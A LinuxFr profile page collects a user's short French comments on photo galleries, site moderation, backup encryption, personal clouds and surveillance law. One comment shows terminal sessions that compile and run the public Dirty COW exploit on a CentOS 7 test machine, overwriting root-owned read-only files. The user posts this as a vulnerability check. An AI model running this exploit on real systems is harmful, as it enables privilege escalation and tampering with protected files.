Xavier Teyssier a écrit 1236 commentaires

Sur ma todo-list, mais plutôt loin dans les priorités, j'ai noté que je voulais tester Piwigo (https://fr.piwigo.org/). J'avais fait un premier test jadis, quand ça s'appelait PhpWebGallery, et j'en ai un un souvenir sympa.
Me semble d'ailleurs que l'auteur est sur Linuxfr.

Bonjour,

Une dépêche annonçant un décès n'est pas vraiment un lieu approprié pour débattre sur la cohabitation entre cyclistes et automobilistes.
Aussi, afin de conserver l'attitude calme que l'on souhaite sur ce type de dépêche, je vous propose de stopper ce fil.
Il est en revanche tout à fait possible de continuer le débat sur ce journal, créé justement à cet effet : https://linuxfr.org/users/anonyme/journaux/accidentologie-securite-routiere-et-cyclisme

Merci pour votre compréhension.

Python semble être le langage du moment : sur les cinq livres choisis, trois sont consacrés à Python !

Il me semble, jadis, avoir lu dans ces pages que les dépêche Kernel de Patrick_g avaient été citées en exemple pour leur qualité dans un journal États-Uniens. Mais je ne suis pas fichu de retrouver trace de l'information.

Owncloud, Nextcloud, Cozycloud…
Avez-vous connaissance d'un comparatif quelque part qui pourrait aider à choisir ?

Pour la modération proprement dite, sur Linuxfr, un article n'est publiable qu'une fois qu'un certain nombre de modérateur ont validé l'article. Si ZeroHeure a pu publier cette dépêche, c'est qu'il y a au moins quatre modérateurs qui l'ont validé comme étant publiable.

Pour le texte, c'est un souhait (une expérience) de la part des modéros de relancer ce qui, à une époque, était appelé les petites brèves de Linuxfr.
À titre perso, j'ai tendance à penser qu'intercaler des articles courts à très court entre de gros articles rend le site plus vivant. Ça permet aussi de communiquer sur des sujets qui ne mérite pas de gros articles/qui n'ont pas d'auteurs ayant le temps d'écrire de longs articles, et qui ne serait du coup pas du tout mentionné ici sans ces articles courts. Enfin, je sais que certains ont envie d'écrire sur Linuxfr, mais sont effrayés par la taille moyenne des articles. Si de courtes dépêches peuvent pousser quelques contributeurs à se lancer, alors c'est tout benef.

Il me semble avoir lu (on notera à quel point je suis sûr de moi) je ne sais plus où qu'aujourd'hui, les sites accessibles en IPv6 sont favorisés dans le classement de Google.

Note : toute personne pouvant me donner une source fiable à ce sujet sera grandement appréciée :-)

Pas besoin d'attendre : il y a déjà plein d'informations pertinentes, et autant faire connaitre le projet dès ces débuts :-)

attendre que le support Armbian et kernel 4.x avance encore un peu plus
Ça, ça pourra être l'occasion de soumettre une seconde dépêche sur le sujet !

si tu chiffres tes disques externes, je suppose que tu chiffres aussi ton NAS (autrement quelqu'un volant ton NAS aurait accès à toutes les données de toutes tes machines) ? Si oui il y a pas mal de problèmes associés

Perso, je conserve une copie de mes sauvegardes sur un disque dur chiffré que je stocke au boulot. Ce disque est chiffré : il a beau être dans un tiroir avec des affaires personnelles, et étiqueté comme étant un disque personnel, je n'ai aucune assurance qu'il ne sera pas accédé par un tiers. Je dirais même que la probabilité, sans être élevée, est loin d'être négligeable.
En tout cas, bien plus élevée que celle de me faire voler mon NAS chez moi.
Du coup, je chiffre mes sauvegardes externes tout comme mes portables, mais aucunement les médiums qui reste chez moi.

Jusqu'à maintenant.

Le mois dernier, j'ai une collègue qui s'est fait cambriolée. Tout a été volé : le portable et les disques durs externes.
Les données originales comme les sauvegardes ont disparues, et sont potentiellement accessibles par n'importe qui.

J'avoue que je commence à me demander comment réagir face à cela aussi.

Le désaccord n'empêche pas la politesse. Merci de s'abstenir de proférer des insultes.

Heu… Tu utilises Kmymoney et skrooge ?

Pourquoi les deux ? Ne font-ils pas la même chose?

Ceci dit, si tu utilises les deux, je suis intéressé par les avantages et défauts de l'un par rapport à l'autre. En espérant être lu en répondant aussi longtemps après…

Pourtant Chez Moi Ça Marche (TM)

Ce doit être très dépendant des machines.
Dans le doute, mise à jour dès que les correctifs seront publiés (je n'ai pas vérifié si c'est le cas aujourd'hui), en restant dans le cadre de la bonne application des processus d'industrialisation en œuvre sur les machines concernées (je parle bien hein ?), me semblent absolument nécessaire.

Je pense que je ne connaissais pas l'option Z de ls, et que je suis content de maintenant la connaitre ! :-)

J'en pense aussi que je pense que nous n'utilisons peut-être pas les mêmes exploits.

Celui que j'ai testé : https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

Mais je n'avais plus les droits d'écriture sur le fichier.

Ceci dit, si ça lève un doute, je recommence sur un fichier appartenant à root :

[xate@xate-test ~]$ echo "test bis de dirtycow" > /tmp/plop2
[xate@xate-test ~]$ chmod 0404 /tmp/plop2
[xate@xate-test ~]$ sudo chown root:root /tmp/plop2
[xate@xate-test ~]$ cat /tmp/plop2
test bis de dirtycow
[xate@xate-test ~]$ ls -ltrh /tmp/plop2
-r-----r--. 1 root root 21 22 oct.  18:27 /tmp/plop2
[xate@xate-test ~]$ ./dirtyc0w /tmp/plop2 newuser:newpassd0
mmap 7f1f28cfc000
[xate@xate-test ~]$ ls -ltrh
-r-----r--. 1 root root 21 22 oct.  18:27 /tmp/plop2
[xate@xate-test ~]$ cat /tmp/plop2
newuser:newpassd0own
[xate@xate-test ~]$

En tout cas, sur CentOS 7, ça fonctionne :

    [xate@xate-test ~]$ cat /etc/redhat-release 
    CentOS Linux release 7.2.1511 (Core) 
    [xate@xate-test ~]$ uname -a
    Linux xate-test.nfrance.com 3.10.0-327.28.2.el7.x86_64 #1 SMP Wed Aug 3 11:11:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

    [xate@xate-test ~]$ sudo echo 'test de la faille dirtycow' > /tmp/plop
    [xate@xate-test ~]$ chmod 0404  /tmp/plop
    [xate@xate-test ~]$ ls -ltrh /tmp/plop
    -r-----r--. 1 xate xate 27 22 oct.  13:47 /tmp/plop
    [xate@xate-test ~]$ cat /tmp/plop
    test de la faille dirtycow
    [xate@xate-test ~]$ gcc -pthread dirtyc0w.c -o dirtyc0w
    [xate@xate-test ~]$ ./dirtyc0w /tmp/plop m00000000000000000
    mmap 7f661fa2f000

    ^C
    [xate@xate-test ~]$ cat /tmp/plop 
    m00000000000000000dirtycow
    [xate@xate-test ~]$ 

Sur certaines archi, quand la prod est tombé, la première chose à faire, le plus important, le plus urgent, c'est de restaurer le service, coûte que coûte, même si ce doit être réalisé avec une solution crade.
Une fois le service à nouveau rendu, là, on met en place des méthodes propres pour que cette panne ne puisse se reproduire, et pour que si ça se reproduise, on puisse corriger de manière propre…

vu que l'on devient un client du groupe canal (de façon indirecte), quid de nos données personnelles ? Ont-elles été transmises ?

Si tu payes Free pour avoir la TV via ta freebox, tu es déjà un client indirect du groupe canal (Vivendi) puisque tu reçois déjà D8. Pourquoi les données transmises changeraient ?

Si ton disque avait des I/O Error, c'est qu'il est en train de mourir.
Fait un dd sir tu veux, mais même si ça passe, ne met plus sur ce disque de données que tu ne souhaites pas perdre.

Non, non. Cozy, c'est pour un seul et unique utilisateur.

Extrait de la FAQ :
Puis-je créer des comptes pour ma famille et mes amis sur mon instance Cozy ?
Cozy est un cloud personnel, et il ne gère pas plusieurs utilisateurs. Cela nous permet d'assurer la sécurité de vos données et de simplifier considérablement l'administration serveur.

Google, s'il te plait, envoie moi un questionnaire sur mes tendances, mes opinions, mes préférences, les fréquences d'usages, les intérêts politiques et culturels.

C'est par là : https://www.google.com/settings/u/0/ads/authenticated

Après la mise sur écoute sans passer par l'autorité judiciaire, ce sont les perquisitions à domicile de jour, comme de nuit, qui pourront se passer de celle-ci.

Mmmm… pas sûr. Si j'en crois mes lectures, l'état d'urgence ne permet pas de se passer de l'autorité judiciaire. Ce que l'état d'urgence ajoute dans les domaines des perquisitions, c'est la possibilité de mener des perquisitions de nuits.
Sauf qu'en pratique, depuis 1997 (date à vérifier !), les perquisitions de nuits sont autorisées dans le cadre d'enquête liées au terrorisme…

Essayer plein de lecteurs différents. J'ai déjà eu en main des cartes Compact Flash qui n'étaient plus visibles depuis plusieurs lecteurs, et encore accessible sur l'un d'eux. Peut-être un problème de tension ?

J'ai vu passer des questions à propos du Windows 10 de Microsoft gratuit

Ah ben oui, si ce système est gratuit, j'ai une question : où le trouver gratuitement ? N'ayant pas de MS Windows chez moi, ça m’intéresse de me le procurer pour quelques tests si je peux le faire gratuitement.

Si vous êtes sensible au devenir de l'espèce humain […] alors […] vous chercherez à n'utiliser que des logiciels libres.

Ah ouais ! Quand même !

Tout cela reste encore au conditionnel car l'histoire ne dévoile pas encore toute son intrigue. L'annonce complète se fera la semaine prochaine au Blackhat USA 2015 et au DEF CON 23.

Ah oui, Ok.
J'attend de voir l'annonce complète alors.
Il y a eu, ces dernières années, tellement d'annonces de faille du genre "C'est la fin du monde, venez à notre conf, on va tout vous dire", pour finir par un simple pétard mouillé… J'attend donc de voir si on est effectivement face à un truc massif, ou si, une fois la conf passée, on pourra conclure qu'en fait, les conditions nécessaires à une concrète exploitation de la faille limite celle-ci à un échantillon faible et pas si inquiétant de téléphone…

J'en pense que tu sous-estimes largement les capacités d'analyse qui peuvent être mise en œuvre, j'en pense qu'il deviendrait plus difficile de distinguer un mail légitime d'un SPAM, j'en pense que répondre à un mail en ne citant que la partie pertinente risque d'être bien plus compliquée, et enfin, j'en pense que beaucoup de forfait data ne seront vraiment pas fan de ton idée…